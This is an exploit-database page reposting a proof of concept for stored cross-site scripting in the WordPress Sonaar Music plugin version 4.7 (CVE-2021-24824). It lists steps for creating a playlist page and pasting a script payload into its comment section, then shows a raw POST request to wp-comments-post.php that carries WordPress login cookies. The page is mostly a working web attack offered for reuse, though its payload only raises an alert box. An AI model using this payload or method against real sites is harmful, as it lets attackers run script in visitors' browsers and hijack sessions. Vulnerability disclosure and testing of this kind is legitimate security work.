WordPress Sonaar Music 4.7 Cross Site Scripting

CVE Category Price Severity
CVE-2021-24824 CWE-79 Not disclosed High
Author Risk Exploitation Type Date
Kohei Matsumoto High Remote 2023-10-10
Our sensors found this exploit at:

Below is a copy:

WordPress Sonaar Music 4.7 Cross Site Scripting
# Exploit Title: Wordpress Sonaar Music Plugin 4.7 - Stored XSS
# Date: 2023-09-05
# Exploit Author: Furkan Karaarslan
# Category : Webapps
# Vendor Homepage:
# Version: 4.7 (REQUIRED)
# Tested on: Windows/Linux
1-First install sonar music plugin.
2-Then come to the playlist add page. >
3-Press the Add new playlist button
4-Put a random title on the page that opens and publish the page. >
5-This is the published page
6-Let's paste our xss payload in the comment section. Payload: <script>alert("XSS")</script>

POST /wp/wordpress/wp-comments-post.php HTTP/1.1
Content-Length: 155
Cache-Control: max-age=0
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie:; comment_author_52c14530c1f3bbfa6d982f304802224a=a%22%26gt%3Balert%28%29; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_52c14530c1f3bbfa6d982f304802224a=hunter%7C1694109284%7CXGnjFgcc7FpgQkJrAwUv1kG8XaQu3RixUDyZJoRSB1W%7C16e2e3964e42d9e56edd7ab7e45b676094d0b9e0ab7fcec2e84549772e438ba9; wp-settings-time-1=1693936486
Connection: close


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum